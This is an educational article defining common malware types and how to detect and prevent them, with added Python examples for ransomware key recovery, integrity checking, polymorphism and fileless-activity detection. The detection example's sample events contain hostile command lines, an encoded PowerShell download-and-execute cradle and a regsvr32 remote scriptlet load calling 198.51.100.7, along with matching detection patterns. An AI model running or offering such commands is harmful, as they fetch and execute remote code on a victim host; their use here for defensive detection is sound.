What is Malware?
Malware is a broad term for any software designed to harm, exploit or gain unauthorized control of a programmable device or network. Types of malware include viruses, worms, Trojan horses, rootkits, ransomware, bots, adware and spyware. In this article, we define several of the most common types.
A given piece of malware is rarely only one of the types described below; it is usually a combination of them. Even so, it is important to understand and differentiate the types in order to detect and defend against them.
A virus is the most widely known type of malware. It infects other files by attaching its own code to them, and it reaches other computers when an infected program is copied there and launched. In this sense, viruses do not spread on their own: they require an unsuspecting user to execute the infected program before the malicious behavior starts.
A worm is much like a virus, but it can self-replicate without a host program and spreads without any human interaction; viruses, by contrast, need a user to run them. A worm is therefore considered a standalone piece of malware. This ability to spread without user interaction is what makes worms so devastating.
Worms typically exploit vulnerabilities in software, especially in operating systems and network services, to spread across networks on their own. For instance, the SQL Slammer worm exploited a buffer overflow in Microsoft SQL Server 2000 with a single UDP packet and infected most of the unpatched SQL servers reachable on the Internet in about 10 minutes.
Trojan horses (or Trojans) disguise themselves as desirable code, or as a normal file or program, to trick users into downloading and installing them. Once installed by the unsuspecting user, they take control of the victim's system and typically give a malicious party remote access to the infected computer.
Trojans are usually introduced into systems via email attachments, cracked applications or fake software patches. One popular technique is displaying a pop-up claiming that the victim's computer is infected, so that the unsuspecting user is tricked into installing the malware, which masquerades as an antivirus program.
Trojans are among the most common types of malware and are hard to defend against. First, they are easy to write and are generated in massive quantities and varieties, so no single signature catches them for long. Second, they spread by tricking users, which bypasses many of the traditional technical controls meant to prevent them.
A rootkit is a type of malware that gives attackers persistent, privileged (administrative or kernel-level) control of a victim's computer while hiding its own presence, and that of other malicious components, from the operating system and security tools. Rootkits are usually loaded into the operating system kernel, a hypervisor or firmware, which is why they are so hard to detect from within the running system. They mostly spread through malicious downloads, phishing or malicious attachments.
Ransomware, one of the most prevalent types of malware today, is malicious software that uses encryption to deny a victim access to their own data and demands a ransom, usually in cryptocurrency, in return for decrypting it.
Ransomware can be prevented like any other type of malware. Once it has infected a system, however, restoring from a backup is usually the only way to recover the data (other than paying the ransom, which does not guarantee a working decryptor). This is because ransomware uses well-known, strong encryption schemes to render the data inaccessible to the victim; the backup has to be offline or otherwise unreachable from the infected network, since ransomware routinely encrypts or deletes any backup it can reach. In rare cases, it is possible to recover the data by finding implementation faults in the malware through reverse engineering, such as predictable key generation or keys left recoverable on the infected system.
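The following is an added example, not code from the original article, showing what an "implementation fault" of the kind just mentioned looks like in practice. It is a toy: the assumed flaw is that the encryptor derives its keystream from Python's non-cryptographic random module seeded with the infection timestamp, and the assumed victim files start with a known header (a PNG-style magic). Under those assumptions an analyst who knows roughly when the infection happened can brute-force the seed. Real ransomware that uses a CSPRNG and AES offers no such opening, which is exactly why the backup is the usual answer.

```python
# Added example (not from the original article): a toy "ransomware" with a
# deliberately weak key derivation, and the recovery routine that exploits it.
# ASSUMPTIONS: the cipher is a keystream from Python's non-cryptographic
# random module seeded with the infection timestamp, and the victim files
# start with a known header.
import random

# Constructed sample victim file: a PNG-style header is the known plaintext
# that the recovery routine tests candidate seeds against.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLE_FILE = PNG_MAGIC + b"constructed file body, nothing real here. " * 4
INFECTION_TIME = 1_700_000_000  # constructed Unix timestamp of the infection


def keystream(seed: int, length: int) -> bytes:
    """Keystream from random.Random(seed). Not cryptographically secure:
    the entire stream is determined by the (small) integer seed."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(length))


def weak_xor(data: bytes, seed: int) -> bytes:
    """XOR data with the keystream. Symmetric: the same call decrypts.
    The implementation fault: 'seed' is just the infection time in seconds."""
    ks = keystream(seed, len(data))
    return bytes(d ^ k for d, k in zip(data, ks))


def recover(ciphertext: bytes, window_start: int, window_end: int,
            magic: bytes = PNG_MAGIC):
    """Brute-force the seed over the suspected infection window (inclusive).
    Only len(magic) bytes are decrypted per candidate, so each trial is cheap.
    Returns (seed, plaintext) on success, or None if no seed in the window
    reproduces the known header."""
    for seed in range(window_start, window_end + 1):
        if weak_xor(ciphertext[:len(magic)], seed) == magic:
            return seed, weak_xor(ciphertext, seed)
    return None


def demo():
    """Encrypt the sample file as the malware would, then recover it knowing
    only that the infection happened within half an hour of INFECTION_TIME."""
    ciphertext = weak_xor(SAMPLE_FILE, INFECTION_TIME)
    result = recover(ciphertext, INFECTION_TIME - 1800, INFECTION_TIME + 1800)
    return ciphertext, result


if __name__ == "__main__":
    ct, found = demo()
    print("recovered seed:", found[0], "plaintext ok:", found[1] == SAMPLE_FILE)
```

The search space here is one hour of seconds, which is why the recovery is instant. Replace the timestamp with 32 random bytes from a CSPRNG and the same brute force becomes infeasible, so the practical lesson for defenders is to check, during triage, whether the sample's key material is derived from anything predictable before assuming the data is gone.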
A bot is an application that performs automated tasks on command on a system; on its own it can be entirely legitimate. Bots can also be used for malicious purposes, usually as part of a group of compromised machines working on the same task under the control of an attacker. Such a group is known as a botnet, and botnets are often rented out to other criminals for their own nefarious purposes. In general, botnets are used to launch remotely controlled flood attacks, such as DDoS (Distributed Denial of Service) attacks.
Adware is a type of malware that automatically delivers unwanted, and potentially malicious, advertisements. Adware usually comes bundled with spyware or as part of another piece of malware, such as a Trojan.
Spyware is a type of malware that collects information about the users of infected computers without their knowledge or consent. Attackers typically spy on information such as passwords or PINs (usually through keyloggers), credit card details, intellectual property or other personal information.
Another related, and somewhat hyped, term that needs to be discussed in the context of malware is fileless malware. Rather than being a category of malware, the term describes an unorthodox exploitation and persistence method.
Traditionally, malware infects a system and spreads through the file system, which is where anti-malware products look for it. Fileless malware instead runs and spreads in memory only, to avoid detection by anti-malware and other security mechanisms. More precisely, it abuses legitimate components that are already present on the system, such as scripting engines, administrative tools, registry keys and OS APIs, and keeps its payload in memory so as to leave as few traces as possible on the infected host. It can later be used to install other malware types, such as Trojans, on the target.
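Because there is no payload file to scan, fileless activity is usually caught from process telemetry rather than from disk. The following is an added example, not code from the original article: it scans constructed process-creation events (parent, image, command line) for a few living-off-the-land indicators, and it decodes PowerShell's base64 UTF-16LE -EncodedCommand argument before matching, since the interesting strings are otherwise invisible. The event records and the indicator list are constructed for illustration and are a small subset of what a real rule set contains.

```python
# Added example (not from the original article): scanning process-creation
# records for the living-off-the-land patterns that fileless malware relies
# on. ASSUMPTIONS: the events below are constructed in a Sysmon/EDR-like
# (parent, image, command line) shape, and the indicator list is a small
# illustrative subset of what a real rule set would contain.
import base64
import re
from typing import List, Optional, Tuple

Event = Tuple[str, str, str]  # (parent image, image, command line)

# Constructed sample events. Event 1 is a Word document spawning an encoded,
# hidden PowerShell download cradle; events 2 and 3 use signed Windows
# binaries to run remote or inline script without writing a payload file.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS: List[Event] = [
    ("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ("WINWORD.EXE", "powershell.exe", "powershell.exe -NoP -W Hidden -Enc " + _ENCODED),
    ("svchost.exe", "regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
    ("explorer.exe", "mshta.exe", 'mshta.exe vbscript:Execute("MsgBox 1")'),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# (pattern, label). Patterns run over the command line plus, for PowerShell,
# the decoded -EncodedCommand payload.
INDICATORS = [
    (re.compile(r"-e(?:nc|ncodedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|FromBase64String", re.I),
     "in-memory download/execute"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://", re.I),
     "regsvr32 loading remote scriptlet"),
    (re.compile(r"\bmshta(?:\.exe)?\b.*(?:vbscript|javascript):", re.I),
     "mshta inline script"),
]
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell's -EncodedCommand is base64 of UTF-16LE text; a rule that
    only looks at the raw command line never sees what is inside it."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: Event) -> List[str]:
    """Return the indicator labels that fire for one event."""
    parent, image, cmdline = event
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded
    hits = [label for pattern, label in INDICATORS if pattern.search(text)]
    # Parent/child relationship: Office should not be launching script hosts.
    if parent.upper() in OFFICE_PARENTS and image.lower() in SCRIPT_HOSTS:
        hits.append("script host spawned by Office")
    return hits


def scan(events: List[Event]) -> List[Tuple[str, List[str]]]:
    """(image, hits) for every event with at least one indicator."""
    flagged = []
    for event in events:
        hits = analyze(event)
        if hits:
            flagged.append((event[1], hits))
    return flagged


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

The parent/child check is deliberately separate from the string patterns: command lines are easy to reshape, but a Word process launching PowerShell is a behavioral fact that survives obfuscation, which is the same reason the article recommends anomaly detection alongside signatures.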
Some of the apparent signs that should make you suspect malware on your system are:
- Increased CPU usage.
- Lagging computer or web browser performance.
- Network connection problems or an unusual increase in network traffic.
- Unusual changes on the system, such as modified or deleted files, or the appearance of strange files or desktop icons.
- Strange behavior, such as freezing or crashing applications.
- Configuration changes, or your antivirus or firewall being turned off.
- Emails or social media messages sent from your accounts without your knowledge.
How to Detect Malware?
Detecting malware on a system can be tricky and requires an array of techniques, such as artificial intelligence based anomaly detection, host integrity checks, host and network traffic analysis and even manual reverse engineering.
This is because modern malware is designed to fool users and security professionals through a variety of evasion and obfuscation techniques. For instance, malware can hide its command-and-control traffic by routing it through existing proxy servers. In more sophisticated cases, it repeatedly changes its own code (polymorphic malware) to defeat signature-based detection. As another example, it can avoid dynamic analysis with anti-sandbox techniques, such as delaying execution or checking for virtualization artifacts, so that the malicious behavior only starts after the sample has left the sandbox.
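The "host integrity check" mentioned above, and the modified, deleted and strange files listed among the warning signs, come down to the same mechanism: a trusted baseline of file hashes compared against a fresh snapshot. The following is an added example, not code from the original article; it builds a constructed directory tree in a temporary location, takes a baseline, simulates a compromise and reports the differences. Paths, file contents and the simulated changes are all constructed for illustration.

```python
# Added example (not from the original article): a minimal host integrity
# check. It hashes a directory tree into a baseline and later diffs a fresh
# snapshot against it to report modified, deleted and newly added files.
# ASSUMPTIONS: it runs over a temporary directory that it constructs itself,
# so no real system files are touched; paths are reported POSIX-style.
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List


def snapshot(root: Path) -> Dict[str, str]:
    """Map relative path -> SHA-256 of contents for every regular file under
    root. Symlinks are skipped so that a planted link cannot redirect the
    check to a different file."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            baseline[path.relative_to(root).as_posix()] = digest.hexdigest()
    return baseline


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as modified, deleted or added relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "deleted": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo() -> Dict[str, List[str]]:
    """Build a constructed tree, take the baseline, simulate a compromise
    (trojanised binary, tampered hosts file, dropped payload, removed file)
    and report the differences."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b"constructed stand-in for the ls binary")
        (root / "etc" / "hosts").write_bytes(b"127.0.0.1 localhost\n")
        (root / "etc" / "passwd").write_bytes(b"root:x:0:0::/root:/bin/sh\n")
        baseline = snapshot(root)

        # Simulated compromise.
        (root / "bin" / "ls").write_bytes(b"constructed stand-in for the ls binary" + b"\x90" * 8)
        (root / "etc" / "hosts").write_bytes(b"127.0.0.1 localhost\n0.0.0.0 updates.example.com\n")
        (root / "etc" / "passwd").unlink()
        (root / "bin" / ".cache").write_bytes(b"constructed dropped payload")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Two caveats a practitioner would add. The baseline must live somewhere the malware cannot rewrite it (off-host, or at least signed), otherwise the attacker simply updates the hashes along with the files. And a kernel-level rootkit of the kind described earlier can lie to the checker about file contents, so on a suspected rootkit infection the comparison should be run from trusted boot media or from outside the host rather than from within it.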
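The polymorphism point above is easier to see with numbers. The following is an added example, not code from the original article: a harmless constructed "payload" is re-encoded under a fresh random XOR key for each generation behind a fixed decoder stub (the assumed structure of a simple polymorphic family), and four detection strategies are applied to the variants. The exact-hash and raw-string signatures fail on every generation, while a signature on the invariant stub and scanning after decoding (what an emulator or sandbox achieves) catch all of them. The stub, payload and strategies are illustrative assumptions, not a real engine.

```python
# Added example (not from the original article): why byte-exact signatures
# fail against polymorphic malware and what still catches it. ASSUMPTIONS:
# the "payload" is a harmless constructed string, each generation re-encodes
# it under a fresh random 4-byte XOR key behind a fixed decoder stub, and the
# four detection strategies are illustrative, not a real engine.
import hashlib
import os
from typing import Dict, Set

PAYLOAD = b"CONSTRUCTED-HARMLESS-PAYLOAD-STRING"
DECODER_STUB = b"STUB:xor4:"  # stands in for the small invariant decoder routine


def make_variant(payload: bytes = PAYLOAD) -> bytes:
    """One 'generation': fresh key, re-encoded body, same stub.
    An all-zero key would leave the payload in the clear, so it is rejected."""
    key = b"\x00" * 4
    while key == b"\x00" * 4:
        key = os.urandom(4)
    body = bytes(b ^ key[i % 4] for i, b in enumerate(payload))
    return DECODER_STUB + key + body


def decode(sample: bytes) -> bytes:
    """What a sandbox or emulator effectively does: run the stub to get the
    real payload back."""
    if not sample.startswith(DECODER_STUB):
        raise ValueError("not a variant of this family")
    key = sample[len(DECODER_STUB):len(DECODER_STUB) + 4]
    body = sample[len(DECODER_STUB) + 4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(sample: bytes, known_hashes: Set[str]) -> Dict[str, bool]:
    """Four detection strategies applied to one sample."""
    is_family = sample.startswith(DECODER_STUB)
    return {
        "hash_signature": sha256(sample) in known_hashes,      # exact file hash
        "raw_string": PAYLOAD in sample,                       # static string scan
        "stub_signature": is_family,                           # invariant decoder bytes
        "emulated": is_family and PAYLOAD in decode(sample),   # scan after decoding
    }


def demo(generations: int = 20) -> Dict[str, int]:
    """Seed the 'AV database' with the hash of the first captured sample,
    then count how many later generations each strategy detects."""
    first = make_variant()
    known = {sha256(first)}
    variants = [make_variant() for _ in range(generations)]
    counts = {k: 0 for k in ("hash_signature", "raw_string", "stub_signature", "emulated")}
    for variant in variants:
        for strategy, hit in classify(variant, known).items():
            counts[strategy] += int(hit)
    counts["distinct_hashes"] = len({sha256(v) for v in variants} | known)
    return counts


if __name__ == "__main__":
    print(demo())
```

Real polymorphic engines also mutate the decoder stub itself (metamorphism), which erodes the stub signature as well; that leaves decoding or executing the sample and watching what it does as the durable strategy, and it is the one the anti-sandbox tricks mentioned above are designed to frustrate.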
"The problem of viruses is temporary and will be solved in two years." (John McAfee)
Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.
How to Prevent Malware?
The best defense against malware is to prevent the infection in the first place. The following best practices help prevent malware infections:
- Train your users to recognize phishing attacks and to avoid infections through malicious websites.
- Be vigilant when downloading files, programs or attachments, and install software only from trusted sources.
- Keep your operating system and applications up to date with current patches.
- Install and run anti-malware software, and keep its signatures current.
- Keep offline backups, so that a ransomware infection can be recovered from without paying.
To learn more about malware, you could also read our article What Is Fileless Malware?